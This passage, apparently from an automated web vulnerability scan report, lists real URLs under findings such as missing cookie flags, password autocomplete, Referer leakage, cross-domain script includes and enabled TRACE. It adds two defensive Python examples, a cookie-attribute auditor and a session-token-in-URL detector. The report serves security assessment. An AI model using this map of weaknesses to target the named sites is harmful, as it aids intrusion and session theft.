14.120. http://sdc.bcbst.com/dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif

14.121. http://segment-pixel.invitemedia.com/pixel

14.122. http://style.omniture.com/

14.123. http://tags.bluekai.com/site/1654

14.124. http://thwest.112.2o7.net/b/ss/devthwesttest/1/H.20.3/s66554260279361

14.125. http://thwest.112.2o7.net/b/ss/thwest/1/H.20.3/s63471572091802

14.126. http://tracker.marinsm.com/tp

14.127. http://ushealth2.opt.video.msn.com/optimizevc.aspx

14.128. http://usmoneynews.opt.video.msn.com/optimizevc.aspx

14.129. http://usmoneytaxes.opt.video.msn.com/optimizevc.aspx

14.130. http://usrealestate2.opt.video.msn.com/optimizevc.aspx

14.131. http://video.msn.com/soapboxservice2.aspx

14.132. http://west.thomson.com/Error/500Error.aspx

14.133. http://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx

14.134. http://west.thomson.com/Register/CreateTransferToken.aspx

14.135. http://west.thomson.com/Signin.aspx

14.136. http://west.thomson.com/default.aspx

14.137. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx

14.138. http://west.thomson.com/store/AddItem.aspx

14.139. http://west.thomson.com/store/DOTD.aspx

14.140. http://west.thomson.com/store/secure/ShoppingBasket.aspx

14.141. http://west.thomson.com/support/contact-us/default.aspx

14.142. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx

14.143. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

14.144. https://west.thomson.com/store/secure/EmptyBasket.aspx

14.145. https://west.thomson.com/store/secure/ShippingInfo.aspx

14.146. https://west.thomson.com/store/secure/ShippingLocation.aspx

14.147. https://west.thomson.com/support/customer-service/order-info.aspx

14.148. http://www.actonsoftware.com/acton/bn/1091/visitor.gif

14.149. http://www.aptm.phoenix.edu/

14.150. http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet

14.151. http://www.aptm.phoenix.edu/AptiNet/hhs

14.152. http://www.bcbst.com/css/base.css

14.153. http://www.bcbst.com/css/footer.css

14.154. http://www.bcbst.com/css/global.css

14.155. http://www.bcbst.com/css/header.css

14.156. http://www.bcbst.com/css/lytebox.css

14.157. https://www.bcbst.com/accounttools/

14.158. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php

14.159. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

14.160. http://www.bing.com/

14.161. http://www.bing.com/sck

14.162. http://www.bing.com/search

14.163. http://www.bing.com/search/

14.164. https://www.fusionvm.com/FusionVM/

14.165. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

14.166. http://www.msn.com/

14.167. http://www.omniture.com/en/contact

14.168. http://www.omniture.com/en/products/conversion/testandtarget

14.169. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

14.170. http://www.omniture.com/en/products/marketing_integration/genesis

14.171. http://www.omniture.com/en/products/marketing_integration/genesis/applications

14.172. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/444

14.173. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/574

14.174. http://www.omniture.com/en/products/marketing_integration/genesis/applications/39/543

14.175. http://www.omniture.com/en/products/multichannel_analytics/insight

14.176. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

14.177. http://www.omniture.com/en/products/online_analytics/digitalpulse

14.178. http://www.omniture.com/en/products/online_analytics/discover

14.179. http://www.omniture.com/en/products/online_analytics/sitecatalyst

14.180. http://www.omniture.com/en/products/online_analytics/survey

14.181. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

14.182. http://www.omniture.com/offer/943

14.183. http://www.realtor.com/search/widgetportal/Widget.aspx
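Sections 10, 13 and 14 are three views of the same thing: attributes missing from a Set-Cookie header. The check below, an added example that is not code from the XSS.CX report or from any site listed in it, parses Set-Cookie values and reports a cookie issued over HTTPS without Secure (section 10), a cookie whose Domain attribute is a parent of the issuing host (section 13) and a cookie without HttpOnly (section 14). The responses in SAMPLE_RESPONSES are constructed placeholders, not captures from the listed hosts.

```python
"""Audit Set-Cookie headers for the three cookie findings in this report:
Secure flag missing on a cookie set over HTTPS (section 10), cookie scoped
to a parent domain (section 13) and HttpOnly flag missing (section 14).

Added example, not code from the XSS.CX report or from any site listed in
it. The responses in SAMPLE_RESPONSES are constructed for illustration.
"""
from urllib.parse import urlsplit


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, attrs).

    attrs maps lower-cased attribute names to their values; flag attributes
    such as Secure and HttpOnly map to True. Splitting on ';' is safe here
    because Set-Cookie attribute values never contain a bare semicolon.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_eq, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_eq else True
    return name.strip(), value, attrs


def parent_domain_scoped(domain_attr, host):
    """True if a Domain attribute widens the cookie beyond the issuing host.

    A Domain equal to the host adds nothing, and one that is not a suffix of
    the host is rejected by browsers; only a proper parent widens the scope
    so that every sibling subdomain also receives the cookie.
    """
    if not domain_attr or domain_attr is True:
        return False
    domain = domain_attr.lstrip(".").lower()
    host = host.lower()
    return domain != host and host.endswith("." + domain)


def audit_cookies(url, set_cookie_headers):
    """Return sorted (cookie_name, finding) pairs for one response.

    finding is 'missing-secure', 'missing-httponly' or 'parent-domain'.
    """
    parsed = urlsplit(url)
    host = parsed.hostname or ""
    findings = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        # Section 10: without Secure, a cookie issued over HTTPS is also sent
        # on plain-HTTP requests to the same host, where it can be sniffed.
        if parsed.scheme == "https" and not attrs.get("secure"):
            findings.append((name, "missing-secure"))
        # Section 14: without HttpOnly the cookie is readable by script, so
        # any XSS on the host can exfiltrate it.
        if not attrs.get("httponly"):
            findings.append((name, "missing-httponly"))
        # Section 13: a parent Domain hands the cookie to every subdomain.
        if parent_domain_scoped(attrs.get("domain"), host):
            findings.append((name, "parent-domain"))
    return sorted(findings)


# Constructed sample responses (hostnames are placeholders, not the sites
# listed in this report).
SAMPLE_RESPONSES = {
    "https://login.example.com/SignIn": [
        "ASP.NET_SessionId=abc123; path=/",
        "auth=tok; Domain=.example.com; Path=/; Secure; HttpOnly",
    ],
    "http://www.example.com/": [
        "pref=1; Domain=.example.com; Path=/; "
        "Expires=Thu, 18 Oct 2012 07:02:54 GMT; HttpOnly",
    ],
}


def audit_all(responses=SAMPLE_RESPONSES):
    """Run audit_cookies over every sample response."""
    return {url: audit_cookies(url, hdrs) for url, hdrs in responses.items()}


if __name__ == "__main__":
    for url, found in audit_all().items():
        for name, finding in found:
            print(f"{finding:17} {name:20} {url}")
```

Two caveats when reading such a list: a Secure finding only matters for a cookie that carries authority (a session or auth token), not for an analytics or preference cookie, and a parent-domain cookie on a tracking host is by design. Triage by what the cookie grants, not by the count of hits.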

15. Password field with autocomplete enabled

15.1. https://checkout.netsuite.com/s.nl

15.2. https://ecommerce.randomhouse.com//email-password.do

15.3. https://ecommerce.randomhouse.com/account.do

15.4. https://ecommerce.randomhouse.com/create-account-submit.do

15.5. https://ecommerce.randomhouse.com/create-account.do

15.6. https://ecommerce.randomhouse.com/sign-in-submit.do

15.7. https://ecommerce.randomhouse.com/sign-in.do

15.8. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn

15.9. http://support.moxiesoft.com/

15.10. http://www.aac.org/site/TR/Events/AWB08

15.11. http://www.bcbst.com/inc/loginform.asp

15.12. https://www.bcbst.com/inc/loginform.asp

15.13. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

15.14. http://www.freemanco.com/store/

15.15. https://www.freemanco.com/store/index.jsp

15.16. http://www.widgetbox.com/account/login_lite.jsp

16. Source code disclosure

17. ASP.NET debugging enabled

18. Referer-dependent response

18.1. http://bstats.adbrite.com/click/bstats.gif

18.2. http://use.typekit.com/k/bpi7eqn-e.css

18.3. http://www.facebook.com/extern/login_status.php

18.4. http://www.facebook.com/plugins/like.php

18.5. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

18.6. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

19. Cross-domain Referer leakage

19.1. http://a.rad.msn.com/ADSAdClient31.dll

19.2. http://a.rad.msn.com/ADSAdClient31.dll

19.3. http://a.rad.msn.com/ADSAdClient31.dll

19.4. http://a.rad.msn.com/ADSAdClient31.dll

19.5. http://a.rad.msn.com/ADSAdClient31.dll

19.6. http://a.rad.msn.com/ADSAdClient31.dll

19.7. http://a.rad.msn.com/ADSAdClient31.dll

19.8. http://a.rad.msn.com/ADSAdClient31.dll

19.9. http://a.rad.msn.com/ADSAdClient31.dll

19.10. http://a.rad.msn.com/ADSAdClient31.dll

19.11. http://a.rad.msn.com/ADSAdClient31.dll

19.12. http://a.rfihub.com/ca.html

19.13. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14

19.14. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

19.15. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

19.16. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

19.17. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

19.18. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

19.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25

19.20. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100

19.21. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100

19.22. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106

19.23. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106

19.24. http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome

19.25. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1

19.26. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1

19.27. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2

19.28. http://advertising.microsoft.com/home

19.29. http://analytics.live.com/Sync.html

19.30. http://b.rad.msn.com/ADSAdClient31.dll

19.31. http://b.rad.msn.com/ADSAdClient31.dll

19.32. http://b.rad.msn.com/ADSAdClient31.dll

19.33. http://b.rad.msn.com/ADSAdClient31.dll

19.34. http://b.rad.msn.com/ADSAdClient31.dll

19.35. http://c.homestore.com/srv/oreo

19.36. https://checkout.netsuite.com/s.nl

19.37. http://cm.g.doubleclick.net/pixel

19.38. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js

19.39. http://ecommerce.randomhouse.com/cart.do

19.40. https://ecommerce.randomhouse.com//create-address.do

19.41. https://ecommerce.randomhouse.com//email-password.do

19.42. https://ecommerce.randomhouse.com//select-address.do

19.43. https://ecommerce.randomhouse.com//view-orders.do

19.44. https://ecommerce.randomhouse.com/account.do

19.45. https://ecommerce.randomhouse.com/create-account.do

19.46. https://ecommerce.randomhouse.com/password.do

19.47. https://ecommerce.randomhouse.com/sign-in.do

19.48. http://explore.live.com/windows-live-messenger

19.49. http://fls.doubleclick.net/activityi

19.50. http://fls.doubleclick.net/activityi

19.51. http://fls.doubleclick.net/activityi

19.52. http://g.adspeed.net/ad.php

19.53. http://googleads.g.doubleclick.net/pagead/ads

19.54. http://googleads.g.doubleclick.net/pagead/ads

19.55. http://googleads.g.doubleclick.net/pagead/ads

19.56. http://googleads.g.doubleclick.net/pagead/ads

19.57. http://googleads.g.doubleclick.net/pagead/ads

19.58. http://googleads.g.doubleclick.net/pagead/ads

19.59. http://googleads.g.doubleclick.net/pagead/ads

19.60. http://googleads.g.doubleclick.net/pagead/ads

19.61. http://lifestyle.msn.com/FeedPageFinal.aspx

19.62. http://m.adnxs.com/tt

19.63. http://m.adnxs.com/tt

19.64. http://matrix.itasoftware.com/js/sites/matrix/nls/site_en-us.js

19.65. http://matrix.itasoftware.com/view/details

19.66. http://money.msn.com/market-news/default.aspx

19.67. http://money.msn.com/market-news/default.aspx

19.68. http://money.msn.com/market-news/post.aspx

19.69. http://money.msn.com/market-news/post.aspx

19.70. http://money.msn.com/tax-tips/post.aspx

19.71. http://moxieinsight.com/

19.72. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom

19.73. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

19.74. http://pixel.fetchback.com/serve/fb/pdc

19.75. http://rad.msn.com/ADSAdClient31.dll

19.76. http://rad.msn.com/ADSAdClient31.dll

19.77. http://rad.msn.com/ADSAdClient31.dll

19.78. http://rad.msn.com/ADSAdClient31.dll

19.79. http://rad.msn.com/ADSAdClient31.dll

19.80. http://rad.msn.com/ADSAdClient31.dll

19.81. http://rad.msn.com/ADSAdClient31.dll

19.82. http://rad.msn.com/ADSAdClient31.dll

19.83. http://rad.msn.com/ADSAdClient31.dll

19.84. http://rad.msn.com/ADSAdClient31.dll

19.85. http://rad.msn.com/ADSAdClient31.dll

19.86. http://rad.msn.com/ADSAdClient31.dll

19.87. http://rad.msn.com/ADSAdClient31.dll

19.88. http://rad.msn.com/ADSAdClient31.dll

19.89. http://rad.msn.com/ADSAdClient31.dll

19.90. http://rad.msn.com/ADSAdClient31.dll

19.91. http://rad.msn.com/ADSAdClient31.dll

19.92. http://rad.msn.com/ADSAdClient31.dll

19.93. http://rad.msn.com/ADSAdClient31.dll

19.94. http://rad.msn.com/ADSAdClient31.dll

19.95. http://realestate.msn.com/article.aspx

19.96. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.97. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.98. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.99. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.100. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.101. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.102. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.103. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.104. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.105. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.106. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.107. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.108. https://secure.bundle.com/Membership/LogOn

19.109. http://theinvestedlife.msn.com/

19.110. http://west.thomson.com/Error/500Error.aspx

19.111. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx

19.112. http://west.thomson.com/store/secure/ShoppingBasket.aspx

19.113. http://west.thomson.com/store/secure/ShoppingBasket.aspx

19.114. http://west.thomson.com/support/contact-us/default.aspx

19.115. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

19.116. https://west.thomson.com/store/secure/ShippingInfo.aspx

19.117. http://www.aac.org/site/TR/Events/AWB08

19.118. http://www.allpages.com/

19.119. http://www.aptm.phoenix.edu/

19.120. https://www.bcbst.com/accounttools/public/askUserId.do

19.121. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php

19.122. http://www.bing.com/

19.123. http://www.bing.com/sck

19.124. http://www.bing.com/sck

19.125. http://www.bing.com/sck

19.126. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx

19.127. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

19.128. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

19.129. http://www.facebook.com/plugins/like.php

19.130. http://www.facebook.com/plugins/like.php

19.131. http://www.freemanco.com/freemanco/

19.132. http://www.google.com/search

19.133. http://www.google.com/search

19.134. http://www.google.com/search

19.135. http://www.magellangps.com/s.nl

19.136. http://www.msn.com/

19.137. http://www.msn.com/

19.138. http://www.msn.com/sck.aspx

19.139. http://www.omniture.com/modules/creative_zones/display.html

19.140. http://www.omniture.com/offer/943

19.141. http://www.randomhouse.com/about/faq/index.php

19.142. http://www.realtor.com/search/widgetportal/Widget.aspx

19.143. http://www.res-x.com/%22http://www.randomhouse.com/images/dyn/cover/
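A session token in a URL (section 11) is exposed twice over: it lands in proxy, server and browser-history logs, and the whole URL is carried in the Referer header to every third-party resource the page loads, which is exactly the cross-domain traffic sections 18 and 19 enumerate. The detector below is an added example, not code from the report; it flags query and servlet-style path parameters either by a conventional session-parameter name (an assumed list) or by the shape of the value. The URLs in SAMPLE_URLS are constructed, not taken from the listed sites.

```python
"""Flag session tokens carried in URLs (section 11). The full URL travels in
the Referer header to every cross-domain resource a page loads (sections 18
and 19), so a token in the query string or path reaches those hosts as well
as proxy and server logs.

Added example, not from the report. SESSION_PARAM_NAMES is an assumed list
and SAMPLE_URLS are constructed for illustration.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names conventionally used for session identifiers (assumed
# list; extend it for the frameworks in scope).
SESSION_PARAM_NAMES = {
    "jsessionid", "phpsessid", "aspsessionid", "asp.net_sessionid",
    "sessionid", "sessid", "sid", "session", "token", "auth", "cfid",
    "cftoken",
}

# Value shapes typical of generated tokens: 32+ hex chars, a UUID, or 20+
# base64url chars. Shape alone is a weaker signal than a known name, so the
# result records which one fired.
TOKEN_SHAPES = [
    re.compile(r"^[0-9a-fA-F]{32,}$"),
    re.compile(r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-"
               r"[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"),
    re.compile(r"^[A-Za-z0-9_\-]{20,}={0,2}$"),
]


def looks_like_token(value):
    """True if value matches one of the generated-token shapes."""
    return any(p.match(value) for p in TOKEN_SHAPES)


def classify(name, value):
    """Return 'name', 'shape' or None for one parameter."""
    if name.lower() in SESSION_PARAM_NAMES:
        return "name"
    if looks_like_token(value):
        return "shape"
    return None


def session_tokens_in_url(url):
    """Return (where, name, value, reason) tuples for suspect parameters.

    where is 'path' for servlet-style ;name=value path parameters or
    'query' for the query string; reason is 'name' or 'shape'.
    """
    parts = urlsplit(url)
    hits = []
    for segment in parts.path.split("/"):
        for param in segment.split(";")[1:]:
            name, _, value = param.partition("=")
            reason = classify(name, value)
            if reason:
                hits.append(("path", name, value, reason))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reason = classify(name, value)
        if reason:
            hits.append(("query", name, value, reason))
    return hits


# Constructed URLs (placeholder hosts, not the sites in this report).
SAMPLE_URLS = [
    "http://shop.example.com/cart.do;jsessionid=5F1A2B3C4D5E6F708192A3B4C5D6E7F8?item=42",
    "http://api.example.net/ping?st=3651dbe5-aec4-42b2-8270-d62db9a25bfe&format=json",
    "http://api.example.net/ping?sid=abc123&format=json",
    "http://www.example.com/search?q=cookies",
]


def scan_all(urls=SAMPLE_URLS):
    """Map each URL to its suspect parameters."""
    return {u: session_tokens_in_url(u) for u in urls}


if __name__ == "__main__":
    for url, hits in scan_all().items():
        for where, name, value, reason in hits:
            print(f"{reason:5} {where:5} {name}={value}  {url}")
```

Shape-only hits need a second look: a widget or asset identifier in a query string has the same form as a session token but grants nothing, and the fix for a genuine token is to move it into a cookie (with the attributes audited above) rather than to strip the Referer.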

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14

20.2. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

20.3. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

20.4. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

20.5. http://advertising.microsoft.com/home

20.6. http://analytics.live.com/Sync.html

20.7. http://blog.widgetbox.com/

20.8. https://checkout.netsuite.com/s.nl

20.9. http://ecommerce.randomhouse.com/cart.do

20.10. https://ecommerce.randomhouse.com//account.do

20.11. https://ecommerce.randomhouse.com//create-address.do

20.12. https://ecommerce.randomhouse.com//email-password.do

20.13. https://ecommerce.randomhouse.com//select-address.do

20.14. https://ecommerce.randomhouse.com//view-orders.do

20.15. https://ecommerce.randomhouse.com/account.do

20.16. https://ecommerce.randomhouse.com/create-account-submit.do

20.17. https://ecommerce.randomhouse.com/create-account.do

20.18. https://ecommerce.randomhouse.com/password.do

20.19. https://ecommerce.randomhouse.com/sign-in-submit.do

20.20. https://ecommerce.randomhouse.com/sign-in.do

20.21. http://explore.live.com/windows-live-messenger

20.22. http://fls.doubleclick.net/activityi

20.23. http://fls.doubleclick.net/activityi

20.24. http://g.adspeed.net/ad.php

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://health.msn.com/

20.28. http://lifestyle.msn.com/

20.29. http://m.adnxs.com/tt

20.30. http://m.adnxs.com/tt

20.31. http://matrix.itasoftware.com/

20.32. http://matrix.itasoftware.com/view/details

20.33. http://money.msn.com/

20.34. http://money.msn.com/ResponseBridge.aspx

20.35. http://money.msn.com/investing/

20.36. http://money.msn.com/market-news/default.aspx

20.37. http://money.msn.com/market-news/post.aspx

20.38. http://money.msn.com/personal-finance/

20.39. http://money.msn.com/tax-tips/post.aspx

20.40. http://money.msn.com/taxes/

20.41. http://moxieinsight.com/

20.42. http://moxieinsight.com/

20.43. http://msn.careerbuilder.com/msn/default.aspx

20.44. https://my.omniture.com/login/

20.45. http://pixel.fetchback.com/serve/fb/pdc

20.46. http://realestate.msn.com/

20.47. http://realestate.msn.com/article.aspx

20.48. http://seclists.org/fulldisclosure/2011/Apr/388

20.49. https://secure.bundle.com/Membership/LogOn

20.50. https://secure.bundle.com/msn

20.51. http://social.msn.com/boards/RequestBridge.aspx

20.52. http://theinvestedlife.msn.com/

20.53. http://us.social.s-msn.com/s/js/16/ue.min.js

20.54. http://west.thomson.com/Error/500Error.aspx

20.55. http://west.thomson.com/default.aspx

20.56. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx

20.57. http://west.thomson.com/store/secure/ShoppingBasket.aspx

20.58. http://west.thomson.com/support/contact-us/default.aspx

20.59. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

20.60. https://west.thomson.com/store/secure/EmptyBasket.aspx

20.61. https://west.thomson.com/store/secure/ShippingInfo.aspx

20.62. https://west.thomson.com/support/customer-service/order-info.aspx

20.63. http://www.aac.org/site/TR/Events/AWB08

20.64. http://www.allpages.com/

20.65. http://www.allpages.com/agriculture/farm-equipment/

20.66. http://www.aptm.phoenix.edu/

20.67. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php

20.68. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx

20.69. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

20.70. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

20.71. http://www.criticalwatch.com/vulnerability-management.aspx

20.72. http://www.facebook.com/plugins/like.php

20.73. http://www.magellangps.com/

20.74. http://www.magellangps.com/Products/eXploristseries

20.75. http://www.magellangps.com/s.nl

20.76. http://www.moxiesoft.com/tal_about/contact.aspx

20.77. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

20.78. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

20.79. http://www.msn.com/

20.80. http://www.msn.com/sck.aspx

20.81. http://www.myhomemsn.com/

20.82. http://www.randomhouse.com/

20.83. http://www.randomhouse.com/about/contact.html

20.84. http://www.randomhouse.com/about/faq/

20.85. http://www.randomhouse.com/about/faq/index.php

20.86. http://www.realtor.com/search/widgetportal/Widget.aspx

20.87. http://www.widgetbox.com/

20.88. http://www.widgetbox.com/list/most_popular

20.89. http://www.widgetbox.com/mobile/

20.90. http://www.widgetbox.com/mobile/builder/

20.91. http://www.widgetbox.com/widgets/make/

21. File upload functionality

21.1. http://mediacdn.disqus.com/1303851120/build/system/upload.html

21.2. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx

22. TRACE method is enabled

22.1. http://amch.questionmarket.com/

22.2. http://tracking.hubspot.com/

22.3. http://www.bertelsmann.com/

23. Database connection string disclosed

24. Email addresses disclosed

24.1. http://ads1.msn.com/ads/abuimg/clear1.gif

24.2. http://ads1.msn.com/library/dap.js

24.3. http://ads1.msn.com/library/dapmsn.js

24.4. http://advertising.microsoft.com/home

24.5. http://blog.widgetbox.com/

24.6. http://cdn.widgetserver.com/syndication/mobilejs/mapp_future.js

24.7. https://checkout.netsuite.com/c.1142057/site/js/general-scripts.js

24.8. http://ecommerce.randomhouse.com/store/js/rh/ecom.js

24.9. http://ecommerce.randomhouse.com/store/js/rh/prototype.js

24.10. http://ecommerce.randomhouse.com/store/js/rh/s_code.js

24.11. https://ecommerce.randomhouse.com//store/js/rh/ecom.js

24.12. https://ecommerce.randomhouse.com//store/js/rh/prototype.js

24.13. https://ecommerce.randomhouse.com//store/js/rh/s_code.js

24.14. https://ecommerce.randomhouse.com/store/js/rh/ecom.js

24.15. https://ecommerce.randomhouse.com/store/js/rh/prototype.js

24.16. https://ecommerce.randomhouse.com/store/js/rh/s_code.js

24.17. http://global.msads.net/defaultads/ads/defaultads/1402.gif

24.18. http://kbportal.thomson.com/js/autoComplete.js

24.19. http://matrix.itasoftware.com/js/sites/matrix/nls/site_en-us.js

24.20. http://media.computerworlduk.com/scripts/s_code.js

24.21. http://mediacdn.disqus.com/1303851120/build/system/disqus.js

24.22. http://moxieinsight.com/

24.23. https://myaccount.west.thomson.com/MYACCOUNT/Scripts/date.js

24.24. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn

24.25. http://pub.widgetbox.com/scripts/jquery/jquery.jodometer.min.js

24.26. http://scripts.omniture.com/javascript.js

24.27. https://secure.bundle.com/assets/js/build/global.min.js

24.28. http://static.move.com/lib/rdc/6.0.10_P1A/common.js

24.29. http://support.moxiesoft.com/

24.30. http://support.moxiesoft.com/tal_includes/generalfunctions.js

24.31. http://west.thomson.com/support/contact-us/default.aspx

24.32. http://www.aac.org/css/FriendraiserUserStyle.css

24.33. http://www.bcbst.com/js/accordian/jquery.dimensions.js

24.34. https://www.bcbst.com/brokers/group/

24.35. https://www.bcbst.com/brokers/individual/

24.36. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

24.37. http://www.bertelsmann.com/bertelsmann_corp/wms41/js/scripts.js

24.38. http://www.cargill.com/company/financial/index.jsp

24.39. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

24.40. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

24.41. http://www.freemanco.com/freemanco/javascript/image-slideshow.js

24.42. http://www.freemanco.com/freemanco/javascript/jquery/jquery.dataTables.js

24.43. http://www.freemanco.com/images/favicon.ico

24.44. http://www.freemanco.com/images/site/small-logo.ico

24.45. http://www.freemanco.com/store/

24.46. http://www.freemanco.com/store/customer/customerSearch.jsp

24.47. http://www.freemanco.com/store/user/forgetUserName.jsp

24.48. https://www.freemanco.com/store/index.jsp

24.49. http://www.itasoftware.com/news-events/

24.50. http://www.itasoftware.com/scripts/hoverIntent.js

24.51. http://www.itasoftware.com/scripts/jquery.mousewheel.js

24.52. http://www.magellangps.com/lp/eXploristfamily/css/styles.css

24.53. http://www.magellangps.com/lp/eXploristfamily/js/main.js

24.54. http://www.magellangps.com/site/js/general-scripts.js

24.55. http://www.moxiesoft.com/tal_about/aboutus.aspx

24.56. http://www.moxiesoft.com/tal_about/contact.aspx

24.57. http://www.moxiesoft.com/tal_news/events-resources.aspx

24.58. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

24.59. http://www.moxiesoft.com/tal_products/kbdemo/

24.60. http://www.moxiesoft.com/tal_products/kbdemo/moxie_v2.swf

24.61. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

24.62. http://www.moxiesoft.com/tal_products/products.aspx

24.63. http://www.moxiesoft.com/tal_products/spaces-assets/colorbox/jquery.colorbox.js

24.64. http://www.randomhouse.com/about/contact.html

25. Private IP addresses disclosed

25.1. http://c.homestore.com/srv/oreo

25.2. http://c.realtor.com/srv/sugar

25.3. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

25.4. http://reviews.west.thomson.com/logging

25.5. http://static.ak.connect.facebook.com/connect.php/en_US

25.6. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

25.7. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

25.8. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

25.9. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.11. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.12. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf

25.13. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/extern/login_status.php

25.19. http://www.facebook.com/extern/login_status.php

25.20. http://www.facebook.com/extern/login_status.php

25.21. http://www.facebook.com/extern/login_status.php

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.facebook.com/extern/login_status.php

25.24. http://www.facebook.com/extern/login_status.php

25.25. http://www.facebook.com/extern/login_status.php

25.26. http://www.facebook.com/extern/login_status.php

25.27. http://www.facebook.com/plugins/like.php

